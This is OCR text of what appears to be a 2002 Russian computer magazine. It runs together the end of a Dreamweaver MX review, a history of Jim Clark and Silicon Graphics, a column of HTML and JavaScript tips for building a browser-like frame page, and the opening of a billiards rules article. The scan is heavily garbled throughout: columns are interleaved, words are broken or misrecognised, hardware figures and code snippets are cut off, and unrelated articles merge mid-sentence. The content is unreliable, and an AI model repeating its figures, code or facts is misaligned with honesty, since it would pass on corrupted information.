в ущерб. Системные требования также не для 
нищих, хотя я никогда не понимал этих запи- 
сей. Раньше у меня все шло на системе, вдвое 
уступающей минимальной, указанной в 
readme. В общем, теперь нам нужны: второй 
пень 300+ MHz, 96 МВ ВАМЫ, а лучше 128, 
275 МВ на винте. Требования, как у игрушки :). 


ПЕРЕМЕНА ВНЕШНОСТИ 
И КОДОВЫЕ ФИЧИ 


Коренные отличия от предшественников налицо 
иво внешнем виде. Палитрытеперь не «болтают- 
ся между ног», как раньше, а прочно привязаны к 
своим местам. Оказалось, это улобнее - раньше 
они могли иногда мешаться, закрывая содержи- 
мое редактируемого документа. В общем, рабо- 
чее место организовано лучше. Хотя и сейчас лю- 
бую панель можно вытащить на середину поля и 
поностальгировать по старым версиям. 
Появилась забавная и архиполезная панель 
под названием Snippets. Сниппеты - это не- 
большие куски кода, в данном случае HTML и 
JavaScript, выполняющие какую-либо тривиаль- 
ную задачу, например, вставляющие в страницу 
текущее время или таблицу лля шапки сайта. 
Если у тебя есть кусок кода, который ты часто 
юзаешь, хорошим решением будет занести его 
в эту панель и вытаскивать по необходимости. 
онец-то появились кодовые подсказки. Ес- 
ли ты пишешь код (HTML, JavaScript и т.л.), то, 
стоит ввести первые буквы, выскакивает ме- 
нюшечка со списком возможных вариантов 
окончания. После ввода, скажем, тега выска- 
ивают готовые варианты его атрибутов и па- 
раметров, а когда ставишь знак «>» (заверша- 
ешь открывающий тег), то автоматически со- 


ство сайтов верстается с помощью таблиц. Те- 
перь таблицы местного пошива будут коррект- 
ны с точки зрения стандарта HTML и будут хо- 
рошо выглядеть в любом браузере. 
Ну и традиционно, как и во всех программах 
acromedia, у Дримвивера четко разработан- 
ная и обширная помощь, занимающая около 17 
мегов на винте. В ней рассмотрены очень мно- 
гие темы, и я назвал бы ее своеобразным учеб- 
ником веб-мастеринга. Начиная с основ и за- 
анчивая базами ланных - все здесь аккуратно 
разложено по полочкам и разжевано. эх, на рус- 
ский бы все это... 
Таким образом, местные сайтостроители не зря 
брызгали слюной, и Dreamweaver МХ - это must 
have для веб-дизайнера. Он получил множество 
наград, болыше любого другого редактора сай- 
тов, его используют настоящие профессионалы 
и известные специалисты, но это все фигня. Ра- 
ботая в нем, ты сам сможешь мутить профи-шту- 
ки, не имея соответствующих знаний, креати- 
вить динамические сайты, и, возможно, попутно 
захочешь изучать что-то новое для себя. А мне 
остается только пожелать тебе успехов в этих 


благородных начинаниях ;). == 
ollie: 


МЕТАМОРФОЗА ЯДРА 


Главные изменения произошли в самом ядре 
программы. Раньше было две разновидности 
Дримвиверов - просто Dreamweaver и 
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«СИЛИКОН» HA ОЩУПЬ (OT 
ТЕРМИНАТОРА К БРОУЗЕРУ) 


Интересно, на что был бы похож КЮЭрский парк ЕВ ВИ ТЛВ ВЕЗЛЬНОтИ 


Спилберга с кукольными динозаврами’? А из 
чего можно было бы сделать T-1000 или 


Смешно нам сейчас, а ведь тогда половина 
совка повелась на этот ляп. Впрочем, так же 
как без Норберта Винера не было бы совре- 
енной кибернетики, так же и безеще одно- 
о такого же сумасшедшего чела не было бы 
современного кино, ни продвинутой 
‚ ни виртуальной реальности (кста- 
ти, этот термин придумал именно он). Зовут 
его Джим Кларк. Он основатель Silicon 
Graphics (SGI), Netscape, Healtheon (сеть 
B л 
5 
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половину «Властелина колец»? До сих пор 
помню фразу из тогда еще советского 
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телевизионного обзора западных 


— ьного медицинского обслуживания), 
киносрильмов, где диктор, по простоте своем О Е ease pananes 


я ля < > < pe : компании по генной инженерии, ориентиро- 
ТЫ И Te PLUS Ss ib ' ванной на потребителя) и еще кучи компа- 


ее = еде : Н^. Мультимиллионер, бывший доходяга, 
' Доктор компьютерных наук, протестующий 


известен только выпускаюнцей сдфильи ВАА и а Е Bs) eT tc 
KUHOKOMNAHMU!». 


ИЗ МАТРОСОВ В АКАДЕМИКИ 


В 1961 г. Гагарин полетел в космос, а Хру- 
щев сажал кукурузу. Где-то в это время 
Кларк, выгнанный за неуспеваемость из 
колледжа, драил палубу на флоте, где, впро- 
чем, также прослыл тормозом и ничего не 
слышал, кроме известного «Май lager!». 
Однако же на службе ему вскоре повезло - 
он лучше всех сдал тест по математике, по- 
сле чего попал в местный ВУЗ. В этот раз 

он как Ленин и быстро стал магист- 
ром физики, доктором компьютерных наук, 

4 году Кларк защитил диссертацию в 
тете штата Юта, где впервые ввел 
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— понятие «виртуальная реальность». С 1978 
| г. Джим Кларк трудился в Стенфордском 
| | университете, где с помощью лучших сту- 
—! дентов и четырех лет работы разработал 
—- my . 

a первый ЗО чип - «Geometry engine» - мощ- 
Г нейший графический ускоритель для обра- 
ie тки трех HON Г KNB льном мас- 
Ld 60 ехмерно а еальном мас 


табе времени (за 15 лет до первого чипа 


В это время в кино потихоньку вползают 
первые компьютерные эффекты - в 1979 го- 
ду был создан первый цветной терминал - 
ВМ 3279, появился первый 8-битный Atari, 
Лукас и ILM применяют компьютерный мон- 
Tax в Star Wars ИЛИ. Народ писает кипятком 
от диснеевского «Трона» (кому охота погля- 
деть на молодого Брюса Бокслейтнера из 
Вавилона 57). В 1982 году в прокате прова- 
ливается Blade Runner. 
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УРОЖДЕННАЯ SGI 


В связи со всем вышеперечисленным Кларк 
решает, что негоже ему с такой головой 
протирать штаны в универе и в 1981 году 
основывает Silicon Graphics - компанию, KO- 
торая реализует его представления о трех- 
ерных компьютерных моделях и системах, 
пособных создавать движущиеся в реаль- 
ом времени трехмерные объекты. Выйдя 
а рынок с «Geometry engine», Силиконы 
рактически подмяли его под себя, так как 
п был крут, свеж и на TOT момент неповто- 
м. Кларк стал олигархом виртуальной ре- 
. Затринадцать лет его руководст- 
годового оборота в 
ллиарла уев. Силикон настолько 
ыстро поднимался, что до 1997 года ана- 
называли его «Вто- 
году силиконовцы стали 
(e) конкурентами Sun Mic ems 
производстве рабочих станций $С- 
оцессорами купленной ими в 1992 году 
омпании MIPS (MIPS - Million Instructions 
Per Second). Кто забыл Te далекие дни: на 
персоналках RISC-apxutektypa сменила 
CISC только с появлением в 1995 Pentium 
Pro. Кстати, SGI покупали не только произ- 
водителей оборудования, но ПО: Alias 
Research и Wavefront, известные ныне все 
ЗВ-шникам как единая Alias Wavefront, были 
уплены в начале 90-х, дабы «Все яйца бы- 
ли в одной корзине». Кстати, про яйца: не- 
смотря на то, что созданная Элиасом все- 
ми любимая Майя была разработана и до 
сих пор пашет под Windows, это единствен- 
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ная систем 


HOM 
System X11 
\eHa верс 
lak 
ro, rpaduy 
System IR 
OpenGL и | 


стандартно 
режиме Ц 
Аб. На сегодняш 
6.5.17 данной 
ак ком 


омпьютеров, 


ное исключение - Силиконы 
рационкой IRIX. Выбор не случаен - с одной 
стороны, это независимость ко 
сторонних поставщиков ПО 
данная модифи 
ентирована на о 
графических данных в реал 
времени. IRIX - 


IX, либо 


ИЯ 


еские станции, 
Х интегр 


называемая 


ация nix о 
бработку больш 


это 64-бит 
а, основанная на U 
Release 4, IEEE POSIX 1003.1, 
Enhancement. Работа може 
текстовом многотерм 


пашут под опе- 


пании от 
а с другой - 


птимально ори- 


х объемов 
ьном масштабе 
ная операцион- 
IX System V 
Ave} ВВ 
Cb либо в 
наль- 
под Х Window 


вест 


рована поддержка 
RIS GL. Файловая система этих 


ний день выпу- 
операционки. 


пьютеры SGI - это, прежде все- 


о в Х Window 


XFS, также 64- 


битная. Это позволяет поддерживать фай- 


лы объемом до 9 


до 18 лимо 
хватает 


agic и 
нием. Там 


SGI испол 
R4400 до В 
тотами от 9 
так мало, а 


SG 
роены по 
причем, во 
метричная. 
про 


ОЗУ и, 
ери 
сследован 
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ляции физ 
альные. Ц 
Industrial S 
- 32 бита, 


play) и GlO 
HOCTb - 64 
мб/секу G 
системной 
пропускная 


ntel, где че 
Worksta 


цессору 
полный контроль за досту 
следовательно, тор 
йные устройства 
‚ифун 
огут быть сведены в такой 
ации памяти, выделению адре- 
па устро 


сегмен 
сов областей досту 


та 


Тбайт (!!!) 
нов Тбайт (то, 


в повседневной ж 
фейс Оськи напом 
окошки, а сама оболочка 
поставляется в 


нает 


вообще куча 


чего нам 


тома объемом 
всем не 
:)). Интер- 


3HU 


всем знакомые 
называется Indigo 
есте с оборудова- 
всего вместе по- 
ставляется, имеется даже модифицирован- 


ный Фотожоп + различные Сад-ы. 


МОЩА ХАРДА 


ьзуются 


0 до 500 МГц... 
я-то думал". 
больше герц, 


ультипроцессор 
личие oT PC, он 


е памяти 


ческих адресов 


ion, кроме самы 


не надо 


все-таки самая главная фишка Силиконов 
- это, конечно же, оборудование. Тут все в 
ажуре: в большинстве граф 
процессоры 
2000 и В 14000 с тактовыми час- 


ческих станций 
MIPS от 


не надо тут: «Че 
PS - это вам не 
тем круче проц. 
х простых, пост- 
ой архитектуре, 


а не всегда сим- 


брать на себя 
ом устройств к 
мозить, так как 
сами проводят 
ции контролле- 
систе- 


йствам 
памяти в 


транс- 
вирту- 


ны в SGI две: 


- Graphics 


EISA - Enhanced 
andard Architectu 
товая частота - 
обмена - 32 мб/сек, 


е (разрядность 
8 Мги, скорость 


программный Plug-n- 
при Output 


(разряд- 


бита, скорость обмена - 267 


О-64 и 133 мб/сек для GIO-32). У 


же шины (память - периферия) 
способность SGI Indy составляет 


400 мб/сек. Видеосистема в SGI - это вооб- 
ще отдельный разговор. Это не одна, а не- 
сколько специализированных плат, соеди- 
ненных между собой. Можно в Real-time пе- 
регонять NTSC в PAL. Разумеется, такая си- 
стема полдерживает OpenGL. 
Вот какие характеристики, например, и 
видеосистема Indigo2 Maximum Impact для 
SGI Indigo 2: 
Командный процессор НОЗ - пересылка 
«графический примитив - процессор геоме- 
степень интеграции кристаллов - 
элементов. 
етр 


и и отображения GE11 
Geometry and Imagi - преобразо- 
е трехмерной геометрии, выполнение 
«скручивания» (convolutions) и других дву- 
ерных операций отображения; 960 

FLOPS - общая мощность обработки: сте- 
пень интеграции кристаллов - 600000 эле- 
ентов. 
ва растровых процессора RE4 (Raster 
Engine) - высокоэффективное пиксел-запол 
нение (Pixel-fill), скорость заполнения 240 
миллионов пикселов в секунду; степень ин 
теграции кристаллов - 300000 элементов 
аждый. 
Четыре процессора пиксел-канала 
(Pixel Pipe Processor) - обеспечение сме 
вания, глубины и добавления псевдослучай- 
ного сигнала; степень интеграции кристал- 
лов - 295000 элементов каждый. 
Буфер изображения RDRAM - широкополос- 
ный буфер изображения с перестраиваемой 
онфигурацией; 32-разрядный двойной бу- 
ерс 24-разрядным 7-буфером. 


РР 


Отец виртуальной реальности Джим Нларк 
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ные 3 брата, из которых самый мошный - 
Fuel, похожи и отличаются в основном объ- 
емом оперативы, видом процов и мульти- 
медиа напиханностью. р 
Все Силикоиды комплектуются плоским 
мониторами: либо 18 - Silicon Graphics ! 
F180/F220, либо 19-24 - FD Тринитронами. 
Плюс по желанию вторым на Dual спаппе! ! 
V12. Про F220, кроме того, что он поддер- ! 
живает опцию картинка в картинке, говорить 
особо нечего, так как и зерно у него здоро- 
вое (0,294 мм), и угол обзора маленький 
(130 градусов), и кроме как к Силикону под- 
ключить его нельзя. Другое дело Е180 - все ! 


ров, скорость обмена - 44,8 Гб/сек, макси- ции и водных судов. Все это огромная тема, 
' мальный объем ОЗУ - 32 Гб, ПЗУ на 584Гби |: которая здесь явно не приживется. 
: куча слотов PCI: у 3000-го же все несколько 
i покруче: 2-512 процов, до 716 Гб и ОЗУ до 1 ПАДЕНИЕ ГИГАНТОВ 
' | б соответственно р 
i Да, кстати, пусть никто не думает, что с таки- i Остается только добавить, сама SGI уже 
‚ ми компами все делается мгновенно. Если : давно не та, что раньше. В первую очередь 
: кому интересно, то на рендеринг «Игрушеч- i это касается ее руководства. В 1992 году из- 
i ной истории» («Toy story») ушло 800000 ча- ! за конфликта с топ-менеджером Эдом Мак- 
‚ сов рабочего времени, хотя для визуализа- Кракеном (Ed McCracken) Джим Кларк ушел 
: ции использовались далеко не слабенькие ‚ с поста члена правления и основал 
для того времени тачки: 87 2-CPU SPARC ! etscape. 
‚ station 20's, 30 4-CPU Sparc-Station 20's и Конфликт, как обычно, произошел из-за Oa- 
i SparcServer 1000, использовавших Pixar's ! бок: Кларк выбил у TimeWarner баксы (30 
‚ Вепаегтап software. Каждый кадр (1/24 ce- иллионов) на создание мультимедийного 
кунды) занимал 5 мегов. Для фильма «Джу- телевещания. МакКрекен же, до этого от- 
‚ манджи» («Jumanji») Карл Фредерик не- | крыто заявлявший об этом, как об очеред- 
: сколько лет делал гриву льва, а для фильма ! ной выходке сумасбродного основателя 
| «Парк Юрского Периода» («Jurassic Park») '! компании, сразу пристроился руководить 
‚ компании ILM пришлось втрое увеличить ! проектом. Кларк сказал свое «Фе» и свалил 
‚ штат сотрудников. ‚ из фирмы. МакКрекен стал президентом 
' Обо всем семействе силиконовых нельзя | компании. В 1997 году (когда даже IBM 
i рассказать на нескольких страницах. Добав- {| праздновала возвращение на рынки) акции 
i ЛЮ ТОЛЬКО, YTO это и полнофункциональные ! SGI ушли на Wall Street в даун, из которого 
‚ серверы, многочисленные тренажеры, | компания смогла выбраться не сразу. О 
: поддерживающие все, вплоть до имитации ; Кларке также довольно много известно: по- 
‚ ночного инфракрасного и радарного виде- ! сле того как в 2000 году AoL прибрала к ру- 
ния, кабин самолетов и танков (ПиСишные ам Нетшкаф, Кларк ушел и оттуда в сторо- 
i симуляторы и рядом не валялись), игровые ! нумедицины, генной инженерии и Интерне- 
у него в ажуре: 0,28, 160 градусов, вес все- ! приставки (Nintendo 64 - совместный проект ! та. Недавно пожертвовал 60 миллионов бу- 
го 9 кило. А вот неболышой списочек под- | SGI и Нинтенлдо - в приставке MIPS процес- азоидов на генные исследования и через 
держиваемых им платформ: O2, О2+, сор и графическая система). Силиконы ис- + несколько дней благополучно забрал их об- 
Octane, Octane2, SGI 750, Onyx2, Onyx 3000; пользуют ANA проектирования ландшафтов, ратно - типа из-за несогласия с Бушем по 
любые системы Windows 98/2000/ХР, ! строений, молекул ДНК, автомобилей, авиа- ! 


Windows МТ или Linux c УСА и ВМ интерфей- ! | 
сами; Apple Macintosh OS 8.0 и выше с ин- ! 
терфейсами VGA, DVI или ADC. Да и серти- ! 
фикатов у него разных до фига. 


ГРАФИЧЕСКИЕ СУПЕРЫ 


Существует еще куча типов Силиконов, 
предназначенных для специальных целей, в 
том числе для отдельного рендеринга. В по- 
следней линейке таких машин две: SGI Origin 
300 И SGI Origin 3000 (самая продаваемая 
линейка суперкомпьютеров SGI). Это уже 
эдакие суперкомпьютеры с заоблачными па- 
раметрами всего, что только возможно. Так, ! 
300-й полдерживает от 2 до 32 процессо- | 


104 november/11/2002 


вопросу использования стволовых клеток 
эмбрионов. Флаг ему в руки. 


В РОССИИ 


ое собственное знакомство с SGI произо- 
‚ло на фестивале «Аниграф 97». Помнится, 
огда я был поражен качеством демонстри- 
руемых эффектов, а еще более - после про- 
смотра конкурсной программы (кассета с 
ней стоила 30 зеленых - сдохнуть можно). На 
ней, среди рекламных роликов и музыкаль- 
ных клипов, демонстрировались результаты 
работ с Силиконом и процесс съемок филь- 
ма «Две звезды» - это нечто (были показаны 
съемки каждого фрагмента в «зеленой ком- 
нате» с применением Motion capture и так 
далее). Всем советую посмотреть - где-ни- 
будь, наверное, можно найти отрывки из на- 
следия «Аниграф Телекино». 


С НЕБЕС НА ЗЕМЛЮ 
Напоследок небольшой ценовой разброс для 
желающих сделать у себя мини-Голливул: 
Silicon WT5-2P400V10-209 Octane2 \10 
Graphics Dual R12000A 400МН?/ 2MB cache, 
256MB Memory, 9GB 10, 000 RPM System 
Disk, 21 Monitor - 35 663$. 

Silicon WT5-2P400V10-536 Octane2 V10 
Graphics Dual R12000A 400MHz/ 2MB cache, 
512MB Memory, 36GB 10, 000 RPM System 
Disk, 21 Monitor - 40 055$. 

Ноутбук WT5-2P400V12-DM2/ Octane2 V12 
GFX Dual В12000А 400MHz/2MB cache, 
512MB Mem, 18GB 10K RPM Sys Disk, 21» 

on, DMedia option - 79714 

КОМУ ИНТЕРЕСНО... 

Первый компьютерный живой персонаж по- 
явился в 1985 году. В фильме «Молодой 
Шерлок Холмс» («The young Sherlock 
Holmes»). Это был рыцарь, выпрыгнувший из 
оконного витража. 

Первый компьютерный герой фильма по- 
явился в 1989 году в фильме Джеймса Кэме- 


=== 


m= = mo 


рона «Бездна». Все помнят каплю 


воды, 


средством морфинга превращавшуюся в ге- 


рое 
В 


чем 
нол 
T10 
пол 
Пр 
пол 


печения свежей перспективы 


в фильма. 


все думают). Механич 
OO протыкает пьющего 


съемках первого Юрско 
ьзовали плавающие мон 


Силиконовый десктоп *3 


ьда вовсе не механическая, а сцена, 


ностью смоделирована на Сил 


ильме «Герминатор 2» гораздо больше 
графики, чем кажется на первый 


взгляд (и 
рука Ар- 

где 
молоко отчима, 
коне. 
го Парка ILM ис- 
торы для обес- 


еская 


Юрский Парк - первый 
этого 
проч 


эксперимент с тексту- 
использовался только 
е неорганические суб- 


Силиконы использовал 

ских двухмерных (на первый взгляд) мульт- 
фильмах, начиная с «Красавицы и чудовища». 
не» в пещере льва прекрасно 
спользуемые для песка партиклы. 
ля рендеринга метеоров в Армагеддоне 
пользовались 16 суперсерверов Origin 
съемок «Властелина колец» 
(который изначально поддерживала SGI) 
потребовалось 80 двухпроцессорных стан- 
ий Octane 230-й и 330-й серий под управ- 
лением Linux. На них были установлены 
Alias|Wavefront Maya (для анимации персо- 
нажей) - 60 мест, Side Effects Software's 
Houdini, Softimage|3D version 3.9 (кстати, 
рупных российских студиях, например, 
Graphics без него тоже никуда) и 
Pinnacle’s Commotion для ротоскопирова- 
ния и огненных эффектов. Всего было за- 
уплено 51 GUI лицензия и 100 лицензий 
для рендеринга (пиратское им покупать 
было западло). 
Сцена выстрелов в «Титанике», когда ко- 
рабль отплывает из Англии, была сделана за 
два дня. Одна группа выстрелов моделиро- 
валась на модели судна в павильоне Fox (где 
монтаж был практически 1:1), а другая - на 
45-футовом кораблике. 
Приставка Nintendo 64 использует спарен- 
ные процессоры «Silicon Graphics» и «MIPS 
Technologies» с такт Й 


сь во всех диснеев- 


овой частотой основно- 
го 64-битного процессора 93,75Mhz и гра- 
ического процессора - 62,5Mhz. В резуль- 
тате их работы практически исчезает текс- 
турное разложение задних планов и объек- 
тов при их приближени 


МУДРОСТЬ ДНЯ 


В завершение хотелось бы процитировать 
фразу Ролана Быкова, открывавшего 
«Аниграф 97»: «Я думаю, что электронное 
искусство только увеличит возможности 
творческого человека, никак не уменьшит, 
но увеличит». Золотые слова. x 
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Seer ПР5 OF WEB 


Vadias (painter@gameland.ru, 


www. freehand.str.ru) 


Эй, приятель! Мы говорили о многих фичах дизайна страниц, но почти не касались браузера - 
а ведь его внешний вид тоже можно менять, и нехило! Благодаря ee типсам 


юзер сможет оценить силищу твоего дизаина, даже уй я с твоеи мегапаги. 
проверены на последних версиях модных 


ецепты были 


браузеров: IE, Netscape, Opera и Mozilla. За более 


ранние версии ручаться не буду : (. Чтобы посмотреть готовый пример, набери URL: 


ВЕСЕ -ru/test. 


Для начала нам следует расчистить место 
для новой навигации, убрав с экрана 
старую. Для этого придется открывать 
новое окно с соответствующими 
параметрами. Итак, файл index.htm будет 
отсылать нас (и их тоже) к новой 
странице, его код будет таким: 


Также не забудь изменить цвета скроллера 
так, чтобы он подходил к твоему дизигну. 
Как это делается, мы писали в 
предыдущих типсах. 

Конечно, часть стандартного интерфейса 
браузера все равно останется, хотя ты 
можешь воспользоваться следующим 


В файле index2.htm, который и будет у нас 
основным, мы расположим два фрейма. 
Обычно их критикуют, но в данном случае 
они вполне уместны. 


<html> 

<head> 

<title>Untitled Document</title> 
<script> 

window. opener.close(); 

</script> 

</head> 


Настраиваем файл с навигацией. Чтобы 
изменялось содержимое только нижнего 


Делаем кнопки «Вперед», «Назад» и 
«Стоп». Подготовь нужные картинки для 
этих кнопок и вставь на нужные места 
(можешь воспользоваться таблицей). 


Кнопку «Назад» вставляем так: 


Наши клевые батоны 


<img src=«nazad.gif» onclick=«nazad()»> 
Кнопку «Стоп» вот так: 

<img src=«stop.gif» onclick=«stop()»> 
Кнопку «Вперед» вот так: 

<img src=«vpered.gif» onclick=«vpered()»> 
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<html> </html> 

<head> 

<title>Untitled Document</title> Таким образом, мы открываем новый файл 
<script> - index2.htm - в новом окне, где 


window.open(«index2.htm», «name», «sta- 
tus, menubar, scrollbars=yes, resizable») 
</script> 

</head> 


присутствуют скроллбар, статус-строка и 
командное меню. 


Но в этом случае безвозвратно 
потеряются такие юзабельные элементы 
управления, как «избранное», поиск и 
настройки. ИМХО, слишком жирная жертва 
прекрасному. 


вариантом сотворения родительской 
форточки: 


window.open(‘index2.htm’, ‘popup’, 
‘fullscreen’) 


<frameset rows=«72px,*» 
frameborder=«no»> 

<frame name=«nav» src=«nav.htm» noresize 
scrolling=«no»> 

<frame name=«down» src=«index3.htm» 
scrolling=«yes»> 
</frameset><noframes></noframes> 
</html> 


они расположены один над другим, через 
запятую записаны их высота (первый - 72 
пикселя, второй - *, это значит «все 
остальное»). Запись «frameborder=no» 
убирает перегородки между фреймами. 
Следующий шаг - настройка фреймов. 
Первый фрейм - nav.htm, это и есть файл 
с навигацией, он не должен менять высоту 
(noresize) и не скроллится 
(scrolling=«no»). У нижнего скроллинг 
присутствует всегда. Не забудь 
поименовать фреймы (атрибут пате). 


Первое, что делает страница при загрузке, 
- закрывает ставшее ненужным окно 
файла index.htm. Далее мы задаем 
параметры фреймов. Rows означает, что 


фрейма, как и положено, между тегами 
<head> и </head> вписываем: 
<base target=«down»> 


Теперь надо подготовить для них функции 
JavaScript. Между тегами <head> и 
</head> вставляй: 

<script> 

function nazad(); 


с твоей паги веселую html’ky с 
пожеланиями приятного отдыха и глубоких 
раздумий. 


history.go(-1) 
} 


function vpered() 


history.go(1); 
} 


function stop() 


window.top.down.location.replace(‘http://c 
oolsite.ru/stop.htm’); 


</script> 


Первые две гоняют юзверя по «хистори» 
вперед (1) и назад (-1), а последняя грузит 


Правда же приятней, чем банальный 
эбаут-бланк 


Чтобы не резать панельку на отдельные 
кнопки (а то переедет еще чего-нибудь), 
можно заюзать тег <тар>. Делается это 
так: вместо отдельных картинок-кнопок 
nazad, vpered и stop мы пихаем в таблицу 
панельку buttonz.gif так: 


<IMG SRC=«buttonz.gif» NAME=«NAVIO» 
WIDTH=243 HEIGHT=72 BORDER=0 
usemap=«#NAVIOMap»> 


Настала очередь адресной строки. Вставь 
ее в нужное место таким макаром: 


<form name=«form1» method=«post» 
action=«»> 

<input type=«text» name=«urla» size=60%> 
</form> 


Мы создали форму, из которой будем 
выдирать инфу, которую введет юзер. По- 
хорошему ее надо бы проверять на 
корректность, но это гимор - обойдемся. 
Имя (в данном случае «urla») обязательно. 
Размер (size) можешь подбирать по своему 
усмотрению. 


Осталось прикрутить нашему браузеру 
свой собственный курсор. К сожалению, 
данная фишка поддерживается только 
ишаком ТЕ 6. Сооруди курсор из 
подручных материалов (есть такая прога 
- Microangelo 98, курсоры можно делать 
в ней), назови его Sor.cur и положи в ту 
же папку, где лежат веб-страницы. После 
этого во все страницы придется вписать 


Если с фантазией туго и сделать свой 
собственный курсор (а также вставить его 
в нужную дырку) составляет для тебя 
проблему, то можешь воспользоваться 


Создав таким образом своего рода скин 
для браузера, его можно использовать в 
качестве основного. Все, что у тебя 
получилось, сохрани на диске (или скачай 
наш скромный труд для примера - www.fre- 
hand.str.ru/test/final.zip), а в настройках 
браузера укажи путь к файлу index.htm в 
качестве стартовой страницы. Вот так. 


Bonus. Страницы, подобные многим 
хоумпагам корпоративного стиля, где 
несколько колонок, много блоков 
информации, обычно собираются из 
кусков, отдельных маленьких страничек, 
которые потом складываются в одно 
целое. Это очень удобно, чтобы не 
возиться с большой страницей, а 
редактировать только ее часть. Обычно 
все это осуществляется с помощью SST 
(Server-Side Includes, вставки Ha 
стороне сервера). Сама технология не 
особенно сложна, однако эти вставки не 
везде поддерживаются, так что 
приходится искать обходные пути. 
Можно вставить файл через тег iframe 
(плавающие фреймы), а можно 
проделать это и JavaScript’om. В том 


В теге указываем имя, размеры и 
идентификатор карты. 
А после таблицы прописываем саму карту: 


<тар name=«NAVIOMap»> 
<агеа shape=«rect» 
coords=«159,7,216,65» onclick=«vpered()»> 
<area shape=«rect» 
coords=«92,7,154,65» onclick=«stop()»> 
<area shape=«rect» 
coords=«30,7,87,65» onclick=«nazad()»> 
</map> 


Вот такая вот панелька 


Рядом с этой строкой вставь картинку, 
которая будет кнопкой активации 
введенного адреса: 


<img src=«go.gif» onclick=«perehod()»> 
Соответственно, между тегами <head> и 
</head> вставляем функцию: 

<script> 


между тегами <head> и </head> такой 
текст: 


<style> 

BODY { cursor : url(«sor.cur»), pointer; } 
A { cursor : url(«sor.cur»), hand; } 
</style> 


услугами сайта http://cometzone.comet- 
systems.com/. 

Здесь ты сможешь выбрать курсор на 
любую тему из двух с половиной тысяч 


Однако все работает! 


месте html-koga основной паги, где 
должна быть вставлена страничка с 
новостями или другой блок, вставляем 
такие теги: 


<script src=«news.js»> 
</script> 


Где news.js - Ta самая В&т(-страница. 
Писать ее лучше в редакторе типа 
Dreamweaver, чтобы не было никаких 
кавычек, а только их символьный 
эквивалент, иначе не сработает. Еще 
она должна быть написана без 


переходов на следующую строку (это не 


отразится на конечном внешнем виде, 
ведь <p> и <br> писать можно). После 


того как она написана, надо оставить от 


TIPS OF WEB 


Shape=«rect» показывает, что активная 
область - прямоугольник, а в coords 
задаются координаты левого верхнего и 
правого нижнего углов активной области. 
На цифры данного примера внимания не 
обращай - мапы прекрасно готовятся в 
редакторе Dreamweaver (и не только), где 
ты обводишь нужную область визуально. 


function perehod() 

var myform=document.form1; 
window.top.down.location.replace(«http://» 
+myform.urla.value); 


</script> 


альною дланью протопчем цапы 


образцов, затем тебе выдадут код, 
который следует просто вставить на свою 
страницу. 


нее только то, что написано между 
тегами <body> и </body>. В самом 
начале надо дописать 
document.write(« »), а в пустое место 
между кавычками вставить весь 
гипертекст и назвать все это News.js 
(или как угодно). 
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Игры с шарами 


Иногда все надоедает. В какой-то мо- 
мент мозг уже не способен перевари- 
вать и воспринимать информациюо, пе- 
реизбыток данных убеганицим тестом 
ползет из-за краев черепной коробки, а 
тело отказывается знаком вопроса рас- 
полагаться перед компом. Это - послед- 
ний знак того, что срочно нужен ре- 
лакс. Пойдет все что угодно: сексцаль- 
ные извращения, цпражнения для глаз, 
поход на выставку в местный музей 
(вдруг, чего интересное дают ?), нц, мо- 
жет быть, еще вылазка в клуб или в по- 
здние гости. Hy, можно еще погонять 
шары. Собственно, про них сегодня и 
пойдет речь. Катать шары, как оказа- 
лось, можно самыми разными способа- 
ми. Играть в бильярд, в боукдинг, в кри- 
кет, в гольф, перебрасывать шар через 
поле, как это делали древние майя и до 
сих пор делают футболисты, шары 
можно делить тысячью разными спосо- 
Bamn (см. историю Старика Хоттабыча, 
там, где про сафьяновые мячи). И это не 
считая мелких разновидностей, кроме, 
простите, карманного бильярда и тому 
подобных игрищ. 

Однако сосредоточимся на играх, где 
шары катают, и чу нас получится биль- 
apo, боцлинг, гольф и крокет. Вот они - 
самые главные шарокатательные игры: 


БИЛЬЯРД 


На самом деле нет такой игры: бильярд. Есть пул, снукер, карамболь 
и русский бильярд. Ну, допустим, в два последних играют редко, но 
тем не менее. 

Есть два кия, шары и стол. Лузы иногда есть, иногда - нет. 
Все остальное - по желанию. Если же влом читать и следо- 
вать правилам, то лучше на них забить - и им не следовать. 
Тем не менее, если все же ты очутился перед незнакомым 
столом, то стоит знать хотя бы общие закономерности, по 
которым строится игра. 

Да, вот еще, обычно, когда играют в бильярд, бьют одним 
шаром о другой шар. Это почти все и так знают, но, на вся- 
кий случай, скажу - вдруг для кого-то это в новинку :). 


РУССКИЙ БИЛЬЯРД 


В русском бильярде огромный стол, большие шары и длин- 
ные кии. Лузы тесные - не прорвешься. В общем, это та за- 
тея, в которой лучше вообще не участвовать, если хочется 
получить легкое и быстрое удовольствие. 


АМЕРИКАНКА 


Самая распространенная игра. Шаров в игре 16. Вначале 
они выставляются в форме пирамиды. Разбиваются - и 
тот, кто первым забил 8 шаров, - выиграл. Бить можно лю- 


бым шаром о любой шар. Кто первый забил свои 8, тот и 
выиграл. Вообще, на самом деле - это довольно сложная 
игра. Но выглядит просто. 


ПУЛ 


Пул - самый демократичный вид бильярда. В него играют 
во всех гангстерских боевиках, просто всех боевиках, в 
американских школах восточных единоборств преподают 
технику фехтования на киях, детей с рабочих нью-йорк- 
ских окраин учат играть в эту игру с «молодых ногтей». 
Именно поэтому мы приводим список того, что нельзя де- 
лать в пуле. 

У тебя есть все шансы схлопотать фол (Fall), ошибку и пе- 
реход хода к противнику в следующих случаях: 

1. Если белый шар (он же биток) не коснулся ни одного 
своего шара. 

2. Если не произошло касания борта белым шаром или иг- 
раемыми шарами после соударения шаров. 

3. Если белый шар попал в лузу. 

4. Если удар по ошибке выполнен чужим шаром. 

5. Если ты ударил не наклейкой. 

6. Если удар произведен во время движения шаров. 

7. Если во время прицеливания ты коснулся шара рукой, 
ногой, одеждой - не суть. 

8. Если во РЕЯ ЕР у тебя отрываются обе ноги от по- 
ла. Т.е. сесть на борт можно, а из прыжка - ни-ни. 

9. Если ты забил шар противника. 

10. Если с разбития ты забил черный шар - противник по- 
лучает право выбора: либо разбить пирамиду заново, ли- 
бо ударить с «руки» (черный шар при этом выставляется 
на точку). 

11. К этому же списку относятся запрещенные удары: 
«Пропих» - когда удар наносится без отрыва кия OT битка. 
Можно выполнять только под углом к бьющему шару. 
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«Нажим» - когда играемый шар упирается в скулу лузы. 
Если на бьющий шар нажать кием, то играемый шар поло- 
жится в лузу. Так вот - так лучше не бить. 

«Двойной удар» - это происходит, когда целишься и легко 
касаешься шара, по которому бьешь. Это тоже нарушение, 
